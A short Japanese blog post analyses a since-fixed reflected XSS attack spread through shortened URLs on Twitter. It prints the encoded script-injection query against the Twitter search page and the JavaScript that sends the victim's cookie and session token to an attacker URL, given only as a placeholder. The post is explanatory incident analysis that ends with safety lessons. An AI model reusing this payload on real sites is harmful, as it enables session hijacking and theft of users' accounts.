IT media Twitterで悪質なスクリプトが流通、cookie盗難の恐れ に関する考察なんぞ.
記事中のツイート内容で検索をかけたら簡単に元ツイートまで辿りつけた.
短縮URLの実態としては
//dev.twitter.com/search?query=%253C/script%253E%253Cscript%20src=%27(jsファイル)%27%253E%253C/script%253E
というように、http://dev.twitter.com/searchへのクエリにscriptの外部読み込みコードを混ぜている様子.(%25=% , %27=' , %3C=< , %3E=>)
具体的には以下のようなコードがtwitterの検索ページに埋め込まれる形になる.
次に、実際に呼び出されていたjsファイルのコードは
window.onload=function(){ location.href='//(指定URL)?cookie='.concat(escape(document.cookie),'&token=',document.body.innerHTML.match(/value\', \'([^\']+)/i)[1]); }
このように、指定URLにクッキーとトークン(ログイン中はずっと一緒)を含めて送りつける様子.サーバー側でログを見ればクッキーとトークンが得られる事になる.
現在この脆弱性は修正された模様.
教訓
・短縮URLを無用心に踏まない
・信頼できるURL先でも注意
・短縮URLサービスはコードが含まれてそうなら警告を出して欲しい...